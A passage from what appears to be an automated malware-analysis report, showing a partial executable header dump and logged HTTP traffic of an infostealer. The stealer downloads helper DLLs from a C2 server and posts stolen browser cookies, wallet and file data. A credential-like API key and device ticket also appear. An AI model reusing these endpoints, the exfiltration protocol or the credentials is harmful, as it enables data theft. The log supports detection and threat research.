cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 10 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 68 00 00 04 00 00 6d 38 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 29 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 7a 7a 65 62 6b 7a 72 00 70 19 00 00 90 4e 00 00 62 19 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6a 6f 76 79 65 73 77 00 10 00 00 00 00 68 00 00 06 00 00 00 d8 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 68 00 00 22 00 00 00 de 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 10 Nov 2024 03:57:42 GMTContent-Type: application/octet-streamContent-Length: 1769472Last-Modified: Sun, 10 Nov 2024 03:45:33 GMTConnection: keep-aliveETag: "67302c5d-1b0000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 10 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 68 00 00 04 00 00 6d 38 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 29 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 7a 7a 65 62 6b 7a 72 00 70 19 00 00 90 4e 00 00 62 19 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6a 6f 76 79 65 73 77 00 10 00 00 00 00 68 00 00 06 00 00 00 d8 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 68 00 00 22 00 00 00 de 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: /APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1731211183455Host: self.events.data.microsoft.comContent-Length: 7973Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 2d 2d 0d 0a Data Ascii: ------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="build"mars------DBKFHJEBAAEBGDGDBFBG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFHIDGIJKJKECBGDBGHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 2d 2d 0d 0a Data Ascii: ------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="message"browsers------HDAFHIDGIJKJKECBGDBG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a Data Ascii: ------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="message"plugins------IDHJEBGIEBFIJKEBFBFH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHJJJECFIECBGDGCAAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 2d 2d 0d 0a Data Ascii: ------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="message"fplugins------DHDHJJJECFIECBGDGCAA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECHost: 185.215.113.206Content-Length: 7335Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHDHIIIECBGCAKFIJHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 2d 2d 0d 0a Data Ascii: ------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------AFCFHDHIIIECBGCAKFIJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file"------GIECFIEGDBKJKFIDHIEC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDGHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file"------JKFIDGDHJEGIEBFHDGDG--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJDHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 2d 2d 0d 0a Data Ascii: ------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="message"wallets------ECFHCGHJDBFIIDGDHIJD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFHHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 2d 2d 0d 0a Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"0c67f607bd5c02da5f225f9c8f86dfc3204ccd30952feff22239831c1c88d29153dca544------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="message"files------BKKKEGIDBGHIDGDHDBFH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 36 37 66 36 30 37 62 64 35 63 30 32 64 61 35 66 32 32 35 66 39 63 38 66 38 36 64 66 63 33 32 30 34 63 63 64 33 30 39 35 32 66 65 66 66 32 32 32 33 39 38 33 31 63 31 63 38 38 64 32 39 31 35 33 64 63 61 35 34 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 